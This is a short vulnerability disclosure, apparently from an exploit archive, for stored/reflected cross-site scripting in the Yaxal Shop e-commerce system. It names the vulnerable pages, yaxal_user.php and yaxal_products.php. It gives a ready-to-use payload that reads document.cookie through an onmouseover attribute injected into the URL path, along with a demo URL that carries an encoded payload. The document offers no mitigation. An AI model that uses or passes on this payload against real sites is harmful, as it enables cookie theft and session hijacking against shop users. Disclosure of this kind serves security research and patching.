Yaxal Shop suffers from multiple cross site scripting vulnerabilities.
efdcb0e001e87561457a9d64ff37db3e28296bfda243fe2c4518be896b218277
# Exploit Title: Yaxal Shop (E-Commerce System) Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.polyspaston.com/content_shopdirector.php
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Page:
yaxal_products.php
yaxal_user.php
Example:
yaxal_user.php/<XSS Code>
yaxal_products.php/<XSS Code>
Exploit:
"onmouseover=prompt(document.cookie)>
Demo:
http://demo.yaxal.com/yaxal_products.php/%22onmouseover=prompt%28905645%29%3E
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr